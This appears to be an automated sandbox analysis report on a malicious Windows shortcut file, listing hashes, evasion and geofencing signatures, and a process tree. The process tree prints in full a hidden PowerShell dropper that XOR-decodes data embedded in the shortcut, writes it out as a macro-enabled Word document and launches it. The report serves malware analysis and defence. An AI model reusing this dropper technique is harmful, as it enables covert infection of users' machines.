Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
27/03/2024, 15:00
Static task
static1
Behavioral task
behavioral1
Sample
fe50f70b185772ec0fe7059d5eada3ce530994d8f3bbaa5c1f7c39ffb49e4503.lnk
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
fe50f70b185772ec0fe7059d5eada3ce530994d8f3bbaa5c1f7c39ffb49e4503.lnk
Resource
win10v2004-20240226-en
General
-
Target
fe50f70b185772ec0fe7059d5eada3ce530994d8f3bbaa5c1f7c39ffb49e4503.lnk
-
Size
161KB
-
MD5
524d6dd5b5781a6ab37f474f2064ef84
-
SHA1
41c464604b7fdf9b72019e6862dcfec0b7fd474c
-
SHA256
fe50f70b185772ec0fe7059d5eada3ce530994d8f3bbaa5c1f7c39ffb49e4503
-
SHA512
2a4c10c0b01daebc5d80c1dbd307e9596898980b8ae827ebc67963e7311def1c5f52a39ea81d593c58d412ee19cd0a4ed1c721b67bb17f44c4a7116b97626e75
-
SSDEEP
3072:Gf1rbO/G+SVQZkQYSdkGjHnUFKRVdQtVXHoHJXxjfci1UeSjETvTgli:e1rqu+kQZkQYSHa+zQX4HJhJhTqi
Malware Config
Signatures
-
resource behavioral2/files/0x000800000001e59e-36.dat -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3352 WINWORD.EXE 3352 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2436 powershell.exe 2436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2436 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3352 WINWORD.EXE 3352 WINWORD.EXE 3352 WINWORD.EXE 3352 WINWORD.EXE 3352 WINWORD.EXE 3352 WINWORD.EXE 3352 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4916 wrote to memory of 4300 4916 cmd.exe 89 PID 4916 wrote to memory of 4300 4916 cmd.exe 89 PID 4300 wrote to memory of 2436 4300 cmd.exe 90 PID 4300 wrote to memory of 2436 4300 cmd.exe 90 PID 2436 wrote to memory of 3352 2436 powershell.exe 94 PID 2436 wrote to memory of 3352 2436 powershell.exe 94
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\fe50f70b185772ec0fe7059d5eada3ce530994d8f3bbaa5c1f7c39ffb49e4503.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 0x0002859F} ^| Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0xAA }; $path = 'C:\Users\Admin\AppData\Local\Temp\tmp' + (Get-Random) + '.docm'; sc $path ([byte[]]($file ^| select -Skip 002942)) -Encoding Byte; ^& $path;2⤵
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden $lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 0x0002859F} | Select-Object -ExpandProperty Name; $file = gc $lnkpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0xAA }; $path = 'C:\Users\Admin\AppData\Local\Temp\tmp' + (Get-Random) + '.docm'; sc $path ([byte[]]($file | select -Skip 002942)) -Encoding Byte; & $path;3⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\tmp1389306653.docm" /o ""4⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3352
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
158KB
MD5f97d80347ad8f8954e4b1a9299394741
SHA158ebf64d99cd5adf091fd4b3d8e374e2d8db5002
SHA256acac51ae38adb5df048791932cdb48cbd73d95fa4421454880bc3dd4ca1c61e5
SHA51200d58c3b95d820ddce34259fc923d0b853904ed87c3a1796474e8bb56f784dde2d9efe6b911804fd88df7e98d835b86c56714762e4552c3d2e91eafaeb50ee76